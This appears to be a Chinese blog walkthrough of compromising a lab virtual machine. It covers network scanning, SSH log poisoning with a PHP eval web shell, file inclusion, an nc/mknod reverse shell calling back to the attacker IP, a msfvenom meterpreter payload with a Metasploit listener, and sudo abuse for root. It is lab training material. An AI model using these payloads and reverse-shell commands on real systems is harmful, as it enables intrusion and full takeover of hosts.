2020-12-04

这里是引用

&&信息收集&&

首先ip收集
nmap 192.168.99.0/24
在这里插入图片描述
再来查看详细信息和是否有隐藏端口
nmap -A -p- 192.168.99.15
好像没有隐藏的端口,靶机开放两个端口,靶机系统为Ubuntu,apache服务器
在这里插入图片描述
目录扫描
dirb
dirb http://192.168.99.15 /usr/share/wordlists/dirb/big.txt
在这里插入图片描述
并未发现什么有价值的目录

&&渗透&&

访问页面
在这里插入图片描述
可能存在文件包含
根据它开启的服务,我们查看其的日志(ssh的)
在这里插入图片描述
然后我们使用一句话木马来进行名字替代
ssh ‘<?php eval($_GET['cmd']);?>’@192.168.99.15
在这里插入图片描述
bp的包在路径后面加上a=phpinfo();测试一下,成功
在这里插入图片描述
加上cmd参数在重新发包一下
在这里插入图片描述
执行成功
在这里插入图片描述

获取shell
mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe在这里插入代码片
记得url编码
mknod+backpipe+p+%26%26+nc+192.168.99.6+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
在这里插入图片描述
shell反弹成功
在这里插入图片描述
交互式命令
python -c ‘import pty;pty.spawn("/bin/bash")’
在这里插入图片描述
貌似权限不太足
提取
awk ‘BEGIN{system("/bin/bash")}’
在这里插入图片描述
root提取
在这里插入图片描述
提权
创建个木马
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.99.6 LPORT=8888 -f elf > shell.elf
在这里插入图片描述
将木马移动到www目录下
在这里插入图片描述
切换到/var/www/html
在这里插入图片描述
开启apache服务
在这里插入图片描述
靶机木马下载,成功
在这里插入图片描述
给予权限
在这里插入图片描述
msfconsole监听
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.99.6
set lport 8888
run
在这里插入图片描述

靶机运行木马
sudo ./xxxlogauditorxxx.py
/var/log/auth.log|./shell.elf
在这里插入图片描述

提权成功
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值